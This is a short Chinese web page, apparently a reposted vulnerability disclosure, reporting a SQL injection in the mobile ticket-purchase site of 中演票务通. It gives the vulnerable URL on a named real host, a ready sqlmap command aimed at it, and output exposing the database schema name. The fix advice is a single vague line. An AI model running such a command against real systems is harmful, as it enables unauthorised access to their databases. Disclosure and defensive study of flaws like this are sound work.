中演票务通某处SQL注入漏洞下载

中演票务通某处SQL注入漏洞

漏洞存在于手机购票、

漏洞地址：http://m.t3.com.cn:80/detail/onlineId/8367430815293495253

sqlmap -u "http://m.t3.com.cn:80/detail/onlineId/8367430815293495253*"

跑起来：

current schema (equivalent to database on Oracle): 'WEBDBA'

表：

其他信息就不去看了、over

修复方案：

敏感内容过滤

上一篇： [公开漏洞]Discuz!内部上百台服务器&大量域名可控制，数万Discuz!用户面临威胁!!!

下一篇： [公开漏洞]乐视渗透纪实第一季最终章.核爆（如何拿下乐视全网大部分机器）

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

中演票务通某处SQL注入漏洞下载

修复方案：

推荐文章

推荐网站